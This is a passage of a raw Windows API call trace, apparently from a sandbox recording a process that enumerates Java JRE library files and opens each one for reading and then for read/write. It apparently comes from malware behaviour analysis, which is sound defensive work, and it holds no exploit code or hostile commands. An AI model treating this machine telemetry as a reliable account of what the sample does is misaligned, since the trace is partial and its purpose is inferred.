ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38)) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.255] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8e40a9d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8e40a9d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8e66d0e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe6827, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javaws.jar", cAlternateFileName="")) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.256] AreFileApisANSI () returned 1 [0097.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar", lpUsedDefaultChar=0x0) returned 50 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.256] AreFileApisANSI () returned 1 [0097.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46748 [0097.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 50 [0097.256] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.257] GetFileType (hFile=0x368) returned 0x1 [0097.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0097.257] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.258] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.258] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.258] CloseHandle (hObject=0x368) returned 1 [0097.258] AreFileApisANSI () returned 1 [0097.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x462e8 [0097.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 50 [0097.258] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.258] GetFileType (hFile=0x368) returned 0x1 [0097.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0097.258] CloseHandle (hObject=0x368) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.260] AreFileApisANSI () returned 1 [0097.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46358 [0097.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 50 [0097.260] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8e40a9d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8e40a9d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8e66d0e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe6827)) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c6de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jce.jar", cAlternateFileName="")) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.260] AreFileApisANSI () returned 1 [0097.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar", lpUsedDefaultChar=0x0) returned 47 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.261] AreFileApisANSI () returned 1 [0097.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0097.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 47 [0097.261] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.261] GetFileType (hFile=0x368) returned 0x1 [0097.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.261] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.262] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.262] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.262] CloseHandle (hObject=0x368) returned 1 [0097.262] AreFileApisANSI () returned 1 [0097.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0097.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 47 [0097.262] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.262] GetFileType (hFile=0x368) returned 0x1 [0097.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0097.262] CloseHandle (hObject=0x368) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.263] AreFileApisANSI () returned 1 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 47 [0097.263] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c6de)) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.263] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfr", cAlternateFileName="")) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | 